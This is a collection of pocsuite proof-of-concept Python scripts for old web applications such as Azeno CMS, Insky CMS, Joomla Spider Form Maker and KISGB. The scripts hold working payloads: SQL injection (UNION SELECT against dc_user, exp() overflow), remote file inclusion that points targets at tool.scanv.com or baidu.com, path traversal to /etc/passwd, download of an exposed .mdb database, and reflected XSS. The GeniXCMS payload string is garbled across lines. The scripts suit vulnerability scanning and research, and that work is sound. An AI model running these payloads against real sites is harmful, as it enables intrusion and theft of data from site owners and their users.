        return self.parse_attack({'VerifyInfo': {'URL': self.url}} if hit else {})

    def parse_attack(self, result):
        """Wrap *result* in an Output: success when non-empty, otherwise fail('failed')."""
        output = Output(self)
        if not result:
            output.fail('failed')
        else:
            output.success(result)
        return output
51 |
52 | register(Cyberfolio_Remote_File_Include)
--------------------------------------------------------------------------------
/Azeno CMS SQL Injection Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import POCBase, Output
6 | from pocsuite.utils import register
7 |
class TestPOC(POCBase):
    """SQL-injection verification check for Azeno CMS (/admin/index.php ``id`` parameter).

    The probe appends a UNION SELECT whose middle column is a fixed prefix
    (0x7165696a71 = "qeijq") concatenated with md5(23333); the check then
    looks for that prefixed digest in the response body.  A hit is reported
    with the full probe URL; for defenders the ``UNION SELECT ... FROM dc_user``
    fragment in the query string is the log signature of this check.
    """
    vulID = 'SSV-67893'  # vul ID
    version = '1'
    author = 'hzr'
    vulDate = '2010-03-13'
    createDate = '2015-10-23'
    updateDate = '2015-10-23'
    references = ['https://www.exploit-db.com/exploits/11711/']
    name = 'Azeno CMS - SQL Injection Vulnerability'
    appPowerLink = 'N/A'
    appName = 'Azeno'
    appVersion = 'N/A'
    vulType = 'SQL Injection'
    desc = '''
    Azeno CMS的/admin/index.php 文件"id" 变量没有进行过滤,造成SQL注入
    '''
    # the sample sites for examination
    samples = ['']

    def _verify(self):
        """Send the UNION probe; success carries the probe URL, failure a fixed message."""
        output = Output(self)
        # Per the pocsuite convention, a distinctive output string is injected so
        # that its presence in the page confirms the injection succeeded.
        payload = "/admin/index.php?id=-1 UNION SELECT 1,CONCAT(0x7165696a71,CAST(md5(23333) AS CHAR),0x20),3,4,5,6,7 FROM dc_user"
        verify_url = self.url + payload
        body = req.get(verify_url).content
        if "qeijq0ba7bc92fcd57e337ebb9e74308c811f" not in body:
            output.fail('SQL Injection Failed')
            return output
        output.success({'VerifyInfo': {'URL': verify_url}})
        return output

    def _attack(self):
        """Attack mode performs exactly the verification request."""
        return self._verify()
41 |
42 | def _attack(self):
43 | return self._verify()
44 |
45 | register(TestPOC)
--------------------------------------------------------------------------------
/Insky CMS 006-0111 - Multiple Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 | from pocsuite.net import req
6 | from pocsuite.poc import Output, POCBase
7 | from pocsuite.utils import register
8 |
class Insky_CMS_Remote_File_Include(POCBase):
    """Remote-file-inclusion verification check for Insky CMS 006-0111 (modules/city.get/city.get.php).

    The probe points the ``ROOT`` parameter at a file on tool.scanv.com and
    searches the response for a fixed hex marker.  What that remote file does
    when the target includes it is not visible here — presumably it only echoes
    the marker, but confirm before use, because the target executes whatever
    that third-party host serves.  ``author`` and ``updateDate`` are blank.
    """
    vulID = '68005'
    version = '1'
    vulDate = '2006-06-25'
    author = ' '
    createDate = '2015-12-20'
    updateDate = ' '
    references = ['http://www.sebug.net/vuldb/ssvid-68005']
    name = 'Insky CMS 006-0111 - Multiple Remote File Include Vulnerability'
    appPowerLink = ''
    appName = 'Insky CMS'
    appVersion = '006-0111'
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        """Attack mode performs exactly the verification request."""
        return self._verify()

    def _verify(self):
        """Issue the inclusion probe and report through parse_attack."""
        probe = '%s/modules/city.get/city.get.php?ROOT=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        body = req.get(probe).content
        # Plain substring test: the marker has no regex metacharacters.
        hit = 'd4d7a6b8b3ed8ed86db2ef2cd728d8ec' in body
        return self.parse_attack({'VerifyInfo': {'URL': self.url}} if hit else {})

    def parse_attack(self, result):
        """Wrap *result* in an Output: success when non-empty, otherwise fail('failed')."""
        output = Output(self)
        if not result:
            output.fail('failed')
        else:
            output.success(result)
        return output
51 |
52 | register(Insky_CMS_Remote_File_Include)
--------------------------------------------------------------------------------
/MyABraCaDaWeb _= 1.0.3 (base) Remote File Include Vulnerabilities.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 | from pocsuite.net import req
6 | from pocsuite.poc import Output, POCBase
7 | from pocsuite.utils import register
8 |
class MyABraCaDaWeb_Remote_File_Include(POCBase):
    """Remote-file-inclusion verification check for MyABraCaDaWeb <= 1.0.3 (pop.php).

    The probe points the ``base`` parameter at a file on tool.scanv.com and
    searches the response for a fixed hex marker.  What that remote file does
    when the target includes it is not visible here — presumably it only echoes
    the marker, but confirm before use, because the target executes whatever
    that third-party host serves.  ``author`` and ``updateDate`` are blank.
    """
    vulID = '63954'
    version = '1'
    vulDate = '2006-09-08'
    author = ' '
    createDate = '2015-12-16'
    updateDate = ' '
    references = ['http://www.sebug.net/vuldb/ssvid-63954']
    name = 'MyABraCaDaWeb <= 1.0.3 (base) Remote File Include Vulnerabilities'
    appPowerLink = ''
    appName = 'MyABraCaDaWeb'
    appVersion = '<= 1.0.3'
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        """Attack mode performs exactly the verification request."""
        return self._verify()

    def _verify(self):
        """Issue the inclusion probe and report through parse_attack."""
        probe = '%s/pop.php?base=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        body = req.get(probe).content
        # Plain substring test: the marker has no regex metacharacters.
        hit = 'd4d7a6b8b3ed8ed86db2ef2cd728d8ec' in body
        return self.parse_attack({'VerifyInfo': {'URL': self.url}} if hit else {})

    def parse_attack(self, result):
        """Wrap *result* in an Output: success when non-empty, otherwise fail('failed')."""
        output = Output(self)
        if not result:
            output.fail('failed')
        else:
            output.success(result)
        return output
52 |
53 | register(MyABraCaDaWeb_Remote_File_Include)
--------------------------------------------------------------------------------
/galleria Mambo Module _= 1.0b Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import Output, POCBase
6 | from pocsuite.utils import register
7 |
class TestPOC(POCBase):
    """Remote-file-inclusion verification check for the galleria Mambo module.

    The probe points ``mosConfig_absolute_path`` of galleria.html.php at
    baidu.com/robots.txt and requires both ``Baiduspider`` and ``Googlebot``
    in the response body.  The target is made to fetch content from a
    third-party host, and the verdict depends on that host being reachable
    from the target (presumably a false negative otherwise).
    NOTE(review): ``name`` refers to "Pearl For Mambo <= 1.6" while ``appName``
    and ``appVersion`` describe the galleria module <= 1.0b — confirm which
    advisory this check belongs to before relying on the reported metadata.
    """
    vulID = '63674'  # ssvid
    version = '1.0'
    author = ['皮皮']
    vulDate = '2006-07-03'
    createDate = '2015-12-24'
    updateDate = '2015-12-24'
    references = ['http://www.sebug.net/vuldb/ssvid-63674']
    name = 'Pearl For Mambo <= 1.6 - Multiple Remote File Include Vulnerabilities'
    appPowerLink = ''
    appName = 'galleria Mambo Module'
    appVersion = '<= 1.0b'
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        """Attack mode performs exactly the verification request."""
        return self._verify()

    def _verify(self):
        """Issue the inclusion probe and report through parse_attack."""
        probe = '%s/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://baidu.com/robots.txt' % self.url
        body = req.get(probe).content
        both_markers = 'Baiduspider' in body and 'Googlebot' in body
        return self.parse_attack({'VerifyInfo': {'URL': self.url}} if both_markers else {})

    def parse_attack(self, result):
        """Wrap *result* in an Output: success when non-empty, otherwise fail('failed')."""
        output = Output(self)
        if not result:
            output.fail('failed')
        else:
            output.success(result)
        return output
50 |
51 | register(TestPOC)
52 |
--------------------------------------------------------------------------------
/AlstraSoft EPay Pro 2.0 - Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 | from pocsuite.net import req
6 | from pocsuite.poc import Output, POCBase
7 | from pocsuite.utils import register
8 |
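class AlstraSoft_EPay_Pro_Remote_File_Include(POCBase):
    """pocsuite POC for SSV-78990: AlstraSoft EPay Pro 2.0 remote file include
    through the ``view`` parameter of ``epal/index.php``.

    The target is asked to include a PHP file hosted on tool.scanv.com and
    the response is searched for the fixed marker that file is expected to
    print. The check therefore depends on a third-party host: if it is down
    the POC reports "failed" for every target, and if it were hijacked the
    target would execute whatever it serves - host the verify file yourself
    for real engagements. The trailing ``?`` presumably neutralises whatever
    the application appends to ``view``.
    """
    vulID = '78990'
    version = '1'
    vulDate = '2005-04-01'
    author = ' '
    createDate = '2015-12-16'
    updateDate = ' '
    references = ['http://www.sebug.net/vuldb/ssvid-78990']
    name = 'AlstraSoft EPay Pro 2.0 - Remote File Include Vulnerability'
    appPowerLink = ''
    appName = 'AlstraSoft EPay Pro'
    appVersion = '2.0'
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        # No separate exploit; attack mode re-runs verification.
        return self._verify()

    def _verify(self):
        result = {}
        vul_url = '%s/epal/index.php?view=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        # timeout added: without it a silent host blocks the scan indefinitely.
        response = req.get(vul_url, timeout=10).content

        # Plain substring test; the marker contains no regex metacharacters.
        if 'd4d7a6b8b3ed8ed86db2ef2cd728d8ec' in response:
            result['VerifyInfo'] = {'URL': self.url}

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Wrap ``result`` in an Output: success when non-empty, else 'failed'."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('failed')
        return output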
52 |
53 | register(AlstraSoft_EPay_Pro_Remote_File_Include)
--------------------------------------------------------------------------------
/Angelo-emlak 1.0 - Database Disclosure Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding:utf-8 -*-
3 | import re
4 | from pocsuite.net import req
5 | from pocsuite.poc import Output, POCBase
6 | from pocsuite.utils import register
7 |
8 |
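class Angelo_emlak_Database_Found(POCBase):
    """pocsuite POC for SSV-67229: Angelo-emlak keeps its Access database
    under the web root at ``veribaze/angelo.mdb`` without access control.

    Verification fetches that path and checks for ``Standard Jet DB``, the
    signature found in the header of Jet/Access ``.mdb`` files. Note that
    ``.content`` downloads the whole database just to inspect its header;
    on a large file this is slow and leaves the full customer database in
    the scanner's memory.
    """
    vulID = '67229'
    version = '1'
    vulDate = '2010-04-27'
    author = 'anonymous'
    createDate = '2015-11-15'
    updateDate = '2015-11-15'
    references = ['http://www.sebug.net/vuldb/ssvid-67229']
    name = 'Angelo-emlak 1.0 - Database Disclosure Vulnerability'
    appPowerLink = ''
    appName = 'Angelo-emlak'
    appVersion = ' '
    vulType = 'Database Found'
    desc = 'Angelo-Emlak在web根目录下保存敏感信息,但缺乏足够的访问控制,远程攻击者可以通过直接向veribaze/angelo.mdb发出请求,下载数据库。'
    samples = ['http://burdurdaemlak.com']

    def _attack(self):
        # Downloading the file is already the whole attack.
        return self._verify()

    def _verify(self):
        result = {}
        vul_url = '%s/veribaze/angelo.mdb' % self.url
        # timeout added: a large or slowly served .mdb must not hang the scan.
        response = req.get(vul_url, timeout=10).content

        # Substring test is equivalent to the original re.search on a literal.
        if 'Standard Jet DB' in response:
            result['VerifyInfo'] = {'URL': self.url}

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Wrap ``result`` in an Output: success when non-empty, else 'failed'."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('failed')
        return output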
51 |
52 | register(Angelo_emlak_Database_Found)
--------------------------------------------------------------------------------
/KISGB _= (tmp_theme) 5.1.1 - Local File Inclusion Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding:utf-8 -*-
3 |
4 |
5 |
6 | from pocsuite.net import req
7 | from pocsuite.poc import Output, POCBase
8 | from pocsuite.utils import register
9 |
10 |
11 |
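class TestPOC(POCBase):
    """pocsuite POC for SSV-65284: local file inclusion in KISGB
    ``view_private.php`` through the ``tmp_theme`` parameter.

    Verification requests ``../../../../../../etc/passwd`` and looks for
    evidence of the passwd file in the response. The original only accepted
    ``/bin/bash``, which misses hosts where no account uses bash (BusyBox,
    Alpine, hardened images); the root entry ``root:<x>:0:0:`` is now accepted
    as well, and the old test is kept so every previously positive target
    still matches.
    ``vulDate``/``createDate`` are epoch timestamps, unlike the ISO dates
    used by sibling POCs.
    """
    vulID = '65284'
    version = '1'
    vulDate = '1206806400'
    createDate = '1442937600'
    references = ['http://www.sebug.net/vuldb/ssvid-65284']
    name = 'KISGB Local File Inclusion'
    appPowerLink = 'http://sourceforge.net/projects/kisgb/'
    appName = 'KISGB (Keep It Simple Guest Book)'
    appVersion = '<=5.1.1'
    vulType = 'Local File Inclusion'
    desc = '''KISGB view_private.php文件在处理传入的参数时存在缺陷,导致产生本地文件包含漏洞。'''
    samples = ['']

    def _attack(self):
        # No separate exploit; attack mode re-runs verification.
        return self._verify()

    def _verify(self, verify=True):
        import re  # function-scope: this file does not import re at the top

        result = {}
        vul_url = '%s/view_private.php?start=1&action=edit&tmp_theme=../../../../../../etc/passwd' % self.url
        response = req.get(vul_url, timeout=10).content

        # Either the original bash marker or the root passwd entry proves the
        # file was included.
        passwd_leaked = ('/bin/bash' in response
                         or re.search(r'root:[^:\n]*:0:0:', response) is not None)
        if passwd_leaked:
            result['VerifyInfo'] = {'URL': self.url}

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Wrap ``result`` in an Output: success when non-empty, else 'failed'."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('failed')
        return output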
56 | register(TestPOC)
--------------------------------------------------------------------------------
/dotWidget CMS _= 1.0.6 (file_path) Remote File Include Vulnerabilities.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 | from pocsuite.net import req
6 | from pocsuite.poc import Output, POCBase
7 | from pocsuite.utils import register
8 |
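class dotWidget_CMS_Remote_File_Include(POCBase):
    """pocsuite POC for SSV-63616: dotWidget CMS <= 1.0.6 remote file include
    through the ``file_path`` parameter of ``index.php``.

    The target is asked to include a PHP file hosted on tool.scanv.com and
    the response is searched for the fixed marker that file is expected to
    print. The check depends on that third-party host being up and
    trustworthy - a hijacked host would have the target execute arbitrary
    code - so host the verify file yourself for real engagements.
    """
    vulID = '63616'
    version = '1'
    vulDate = '2006-06-05'
    author = ' '
    createDate = '2015-12-16'
    updateDate = ' '
    references = ['http://www.sebug.net/vuldb/ssvid-63616']
    name = 'dotWidget CMS <= 1.0.6 (file_path) Remote File Include Vulnerabilities'
    appPowerLink = ''
    appName = 'dotWidget CMS'
    appVersion = '<= 1.0.6'
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        # No separate exploit; attack mode re-runs verification.
        return self._verify()

    def _verify(self):
        result = {}
        vul_url = '%s/index.php?file_path=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        # timeout added: the original request could hang the scan forever.
        response = req.get(vul_url, timeout=10).content

        # The marker contains no regex metacharacters; substring test suffices.
        if 'd4d7a6b8b3ed8ed86db2ef2cd728d8ec' in response:
            result['VerifyInfo'] = {'URL': self.url}

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Wrap ``result`` in an Output: success when non-empty, else 'failed'."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('failed')
        return output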
52 |
53 | register(dotWidget_CMS_Remote_File_Include)
--------------------------------------------------------------------------------
/Hitweb _= 4.2.1 (REP_INC) Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 | from pocsuite.net import req
6 | from pocsuite.poc import Output, POCBase
7 | from pocsuite.utils import register
8 |
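class Hitweb_Remote_File_Include(POCBase):
    """pocsuite POC for SSV-63807: Hitweb <= 4.2.1 remote file include through
    the ``REP_INC`` parameter of ``genpage-cgi.php``.

    The target is asked to include a PHP file hosted on tool.scanv.com and
    the response is searched for the fixed marker that file is expected to
    print. Because the check relies on a third-party host, an outage reads
    as "not vulnerable" and a hijack would make the target execute foreign
    code; host the verify file yourself for real engagements.
    """
    vulID = '63807'
    version = '1'
    vulDate = '2006-08-08'
    author = ' '
    createDate = '2015-12-17'
    updateDate = ' '
    references = ['http://www.sebug.net/vuldb/ssvid-63807']
    name = 'Hitweb <= 4.2.1 (REP_INC) Remote File Include Vulnerability'
    appPowerLink = 'http://freshmeat.net/redir/hitweb/15633/url_tgz/hitweb-4.2_php.tgz'
    appName = 'Hitweb'
    appVersion = '<= 4.2.1'
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        # No separate exploit; attack mode re-runs verification.
        return self._verify()

    def _verify(self):
        result = {}
        vul_url = '%s/genpage-cgi.php?REP_INC=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        # timeout added so a silent host cannot stall the scan.
        response = req.get(vul_url, timeout=10).content

        # Plain substring test; equivalent to the original literal re.search.
        if 'd4d7a6b8b3ed8ed86db2ef2cd728d8ec' in response:
            result['VerifyInfo'] = {'URL': self.url}

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Wrap ``result`` in an Output: success when non-empty, else 'failed'."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('failed')
        return output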
52 |
53 | register(Hitweb_Remote_File_Include)
--------------------------------------------------------------------------------
/Minerva _= 2.0.21 build 238a (phpbb_root_path) File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 |
7 |
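class TestPOC(POCBase):
    """pocsuite POC for SSV-64022: Minerva <= 2.0.21 build 238a remote file
    include through ``phpbb_root_path`` of ``admin_topic_action_logging.php``.

    Two defects in the original are fixed here. The ``if`` line had a
    misplaced colon (``'Googlebot': in res.content``), which is a SyntaxError
    and prevented the whole module from loading. The include URL was
    ``http://?`` - no host at all - so the include could never succeed; it now
    points at ``http://baidu.com/robots.txt?`` like the sibling Mambo POCs,
    which is the file whose ``Baiduspider``/``Googlebot`` entries the check
    already looks for. The trailing ``?`` presumably neutralises the path the
    application appends to ``phpbb_root_path``. The check still depends on a
    third-party resource that may change.
    """
    vulID = '64022'  # ssvid
    version = '1.0'
    author = ['皮皮']
    vulDate = '2006-09-28'
    createDate = '2015-12-24'
    updateDate = '2015-12-24'
    references = ['http://www.sebug.net/vuldb/ssvid-64022']
    name = 'Minerva <= 2.0.21 build 238a (phpbb_root_path) File Include Vulnerability'
    appPowerLink = 'http://prdownloads.sourceforge.net/minerva/Minerva-238a.zip?download'
    appName = 'Minerva'
    appVersion = '<= 2.0.21'
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        # Attack mode is identical to verification.
        return self._verify()

    def _verify(self):
        result = {}
        vul_url = ('%s/admin/admin_topic_action_logging.php'
                   '?setmodules=attach&phpbb_root_path=http://baidu.com/robots.txt?' % self.url)
        # timeout added so an unresponsive host cannot stall the scan.
        content = req.get(vul_url, timeout=10).content

        # Both robots.txt user agents must be echoed back.
        if 'Baiduspider' in content and 'Googlebot' in content:
            result['VerifyInfo'] = {'URL': self.url}

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Wrap ``result`` in an Output: success when non-empty, else 'failed'."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('failed')
        return output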
50 |
51 | register(TestPOC)
--------------------------------------------------------------------------------
/GeniXCMS 0.0.3 - XSS Vulnerabilities.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | # Download Link: https://www.exploit-db.com/apps/969a9a0c12a219fb5e3658eeaff4e426-GeniXCMS-v0.0.3.zip
4 |
5 | from pocsuite.net import req
6 | from pocsuite.poc import POCBase, Output
7 | from pocsuite.utils import register
8 |
9 |
class TestPOC(POCBase):
    """pocsuite POC for reflected XSS in GeniXCMS 0.0.3 ``gxadmin/index.php``
    (parameter ``q``).

    NOTE(review): the payload literal below is broken across three lines in
    this listing and the success marker likewise contains a raw newline. The
    markup around ``SEBUG@NET`` was most likely stripped when the file was
    rendered; as shown, the string is not valid Python and must be restored
    from the original source before this POC can run.
    ``references`` is a bare string here while sibling POCs use a list.
    """
    vulID = '89322'  # vul ID
    version = '1'
    author = 'p9k4r'
    vulDate = '2015-06-21'
    createDate = '2015-10-12'
    updateDate = '2015-10-12'
    references = 'https://packetstormsecurity.com/files/132397/GeniXCMS-0.0.3-Cross-Site-Scripting.html'
    name = 'GeniXCMS 0.0.3 - XSS Vulnerabilities'
    appPowerLink = 'http://www.genixcms.org'
    appName = 'genixcms'
    appVersion = '0.0.3'
    vulType = ' XSS '
    desc = '''
gxadmin/index.php 页面参数 q 存在反射性XSS
'''

    def _verify(self):
        # Reflected-XSS probe; see the class docstring about the mangled literal.
        # No timeout is passed, unlike most sibling POCs.
        path = self.url + "/gxadmin/index.php?page=posts&q=1'
SEBUG@NET
"
        res = req.get(path)
        return self.parse_verify(res)

    def parse_verify(self, res):
        """Report success only on HTTP 200 with the marker reflected in the body."""
        output = Output(self)
        result = {}

        if res.status_code == 200 and 'SEBUG@NET
' in res.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = res.url
            output.success(result)

        else:
            output.fail('Internet Nothing returned')

        return output

    def _attack(self):
        # No separate exploit; attack mode re-runs verification.
        return self._verify()
49 |
50 |
51 | register(TestPOC)
52 |
--------------------------------------------------------------------------------
/Joomla Spider Form Maker _= 3.4 - SQLInjection.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding:utf-8 -*-
3 | from pocsuite.net import req
4 | from pocsuite.poc import Output, POCBase
5 | from pocsuite.utils import register
6 |
7 |
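class TestPOC(POCBase):
    """pocsuite POC for SSV-87285: error-based SQL injection in the ``id``
    parameter of Joomla Spider Form Maker <= 3.4 (``com_formmaker``).

    The payload forces a MySQL ``exp()`` overflow error whose message carries
    ``md5(456546)``; the POC succeeds when that hash appears in the response,
    which means the target echoes database errors. Nothing beyond the hash
    is extracted.
    NOTE(review): ``appPowerLink`` points at a youtube-gallery product page,
    not Spider Form Maker - confirm the vendor link.
    """
    vulID = '87285'
    version = '1'
    vulDate = '2014-09-07'
    author = 'anonymous'
    createDate = '2015-09-30'
    updateDate = '2015-09-30'
    references = ['http://www.sebug.net/vuldb/ssvid-87285']
    name = 'Joomla Spider Form Maker SQL Injection '
    appPowerLink = 'http://www.joomlaboat.com/youtube-gallery'
    appName = 'Joomla Spider Form Maker'
    appVersion = '<= 3.4'
    vulType = 'SQL Injection'
    desc = 'Joomla Spider Form Maker SQL Injection in id'
    samples = ['']

    def _attack(self):
        # No data extraction implemented; attack mode re-runs verification.
        return self._verify()

    def _verify(self, verify=True):
        result = {}
        payload = '||exp(~(select*from(select md5(456546))a))'
        vul_url = '%s/index.php?option=com_formmaker&view=formmaker&id=1' % self.url
        # timeout added: a slow or silent host must not stall the scan.
        response = req.get(vul_url + payload, timeout=10).content

        if 'e02f052b7d3db73f99d4f5801f2b6fff' in response:
            result['VerifyInfo'] = {'URL': self.url}

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Wrap ``result`` in an Output: success when non-empty, else 'failed'."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('failed')
        return output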
51 |
52 | register(TestPOC)
--------------------------------------------------------------------------------
/MunkyScripts Simple Gallery SQL Injection Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
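class TestPOC(POCBase):
    """pocsuite POC for SSV-68151: UNION-based SQL injection in the ``cid``
    parameter of MunkyScripts Simple Gallery ``gallery.php``.

    The injected SELECT places ``md5(1)`` in the third column; the POC
    succeeds when that hash (c4ca4238a0b923820dcc509a6f75849b) is rendered.
    Fixes over the original: ``_attack`` called ``self._verify(self)``, which
    passes ``self`` twice and raised TypeError whenever attack mode was used;
    and ``vulType`` was 'Other' although the POC is a SQL injection.
    """
    vulID = '68151'  # ssvid
    version = '1.0'
    author = ['0xFATeam']
    vulDate = ''
    createDate = '2016-01-08'
    updateDate = '2016-01-08'
    references = ['http://www.sebug.net/vuldb/ssvid-68151']
    name = 'MunkyScripts Simple Gallery SQL Injection Vulnerability'
    appPowerLink = ''
    appName = 'MunkyScripts Simple Gallery'
    appVersion = ''
    vulType = 'SQL Injection'  # was 'Other'; the payload is a SQL injection
    desc = '''
    '''
    samples = ['']

    def _verify(self):
        payload = "/gallery.php?cid='/**/UNION/**/SELECT/**/1,2,(concat_ws(0x3a,md5(1))),4 %23"
        # timeout added so a silent host cannot stall the scan.
        response = req.get(self.url + payload, timeout=10)
        return self.parse_output(response)

    def _attack(self):
        # No extraction implemented; attack mode re-runs verification.
        return self._verify()

    def parse_output(self, response):
        """Succeed when md5(1) is echoed in the body, otherwise report failure."""
        output = Output(self)
        result = {}

        if response and 'c4ca4238a0b923820dcc509a6f75849b' in response.content:
            result['VerifyInfo'] = {'URL': response.url}
            output.success(result)
        else:
            output.fail('Internet Nothing Returned')

        return output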
50 |
51 |
52 | register(TestPOC)
--------------------------------------------------------------------------------
/interact _= 2.2 (CONFIG[BASE_PATH]) Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 | from pocsuite.net import req
6 | from pocsuite.poc import Output, POCBase
7 | from pocsuite.utils import register
8 |
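class interact_Remote_File_Include(POCBase):
    """pocsuite POC for SSV-63658: interact <= 2.2 remote file include through
    ``CONFIG[BASE_PATH]`` of ``admin/autoprompter.php``.

    Fix over the original: the include URL was wrapped in square brackets
    (``=[http://...?]``), presumably copied from the advisory's notation,
    which would make the target try to include a file literally named
    ``[http://...]`` and could never match. The bare URL is used now, as in
    the sibling RFI POCs. The check still depends on tool.scanv.com serving
    a file that prints the marker; host it yourself for real engagements.
    """
    vulID = '63658'
    version = '1'
    vulDate = '2006-08-19'
    author = ' '
    createDate = '2015-12-16'
    updateDate = ' '
    references = ['http://www.sebug.net/vuldb/ssvid-63658']
    name = 'interact <= 2.2 (CONFIG[BASE_PATH]) Remote File Include Vulnerability'
    appPowerLink = 'https://sourceforge.net/projects/cce-interact/'
    appName = 'interact'
    appVersion = '<= 2.2'
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        # No separate exploit; attack mode re-runs verification.
        return self._verify()

    def _verify(self):
        result = {}
        vul_url = '%s/admin/autoprompter.php?CONFIG[BASE_PATH]=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        # timeout added so a silent host cannot stall the scan.
        response = req.get(vul_url, timeout=10).content

        if 'd4d7a6b8b3ed8ed86db2ef2cd728d8ec' in response:
            result['VerifyInfo'] = {'URL': self.url}

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Wrap ``result`` in an Output: success when non-empty, else 'failed'."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('failed')
        return output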
52 |
53 | register(interact_Remote_File_Include)
--------------------------------------------------------------------------------
/mambo com_babackup Component _= 1.1 File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 |
7 |
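class TestPOC(POCBase):
    """pocsuite POC for SSV-63864: remote file include in the Mambo
    com_babackup component via ``mosConfig_absolute_path`` of ``Tar.php``.

    The target is asked to include ``http://baidu.com/robots.txt?`` and the
    response must contain both ``Googlebot`` and ``Baiduspider``. The
    trailing ``?`` presumably neutralises whatever path the component
    appends. The check depends on a third-party file whose content may
    change, which would turn every target into a false negative.
    """
    vulID = '63864'  # ssvid
    version = '1.0'
    author = ['皮皮']
    vulDate = '2006-08-22'
    createDate = '2015-12-24'
    updateDate = '2015-12-24'
    references = ['http://www.sebug.net/vuldb/ssvid-63864']
    name = 'mambo com_babackup Component <= 1.1 File Include Vulnerability'
    appPowerLink = 'http://mamboxchange.com/frs/download.php/5072/com_babackup_1.1.zip'
    appName = 'mambo com_babackup Component'
    appVersion = '<= 1.1'
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        # Attack mode is identical to verification.
        return self._verify()

    def _verify(self):
        result = {}
        vul_url = ('%s/administrator/components/com_babackup/classes/Tar.php'
                   '?mosConfig_absolute_path=http://baidu.com/robots.txt?' % self.url)
        # timeout added so an unresponsive host cannot stall the scan.
        body = req.get(vul_url, timeout=10).content

        if 'Googlebot' in body and 'Baiduspider' in body:
            result['VerifyInfo'] = {'URL': self.url}

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Wrap ``result`` in an Output: success when non-empty, else 'failed'."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('failed')
        return output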
50 |
51 | register(TestPOC)
--------------------------------------------------------------------------------
/ecoCMS 18.4.2010 'admin.php' Cross Site Scripting Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import POCBase, Output
6 | from pocsuite.utils import register
7 | from urlparse import urljoin
8 |
class TestPOC(POCBase):
    """pocsuite POC for SSV-87089 / EDB-33925: reflected XSS in ecoCMS
    18.4.2010 ``admin.php`` via the ``p`` parameter.

    A ``"><script>alert(/SebugTest/)</script>`` payload is sent URL-encoded
    and the page is considered vulnerable when ``>alert(/SebugTest/)`` comes
    back unescaped. ``urljoin`` with a leading-slash payload replaces any
    path already present in ``self.url``. The HTTP status is not checked.
    """
    vulID = 'SSV-87089'  # vul ID
    version = '1'
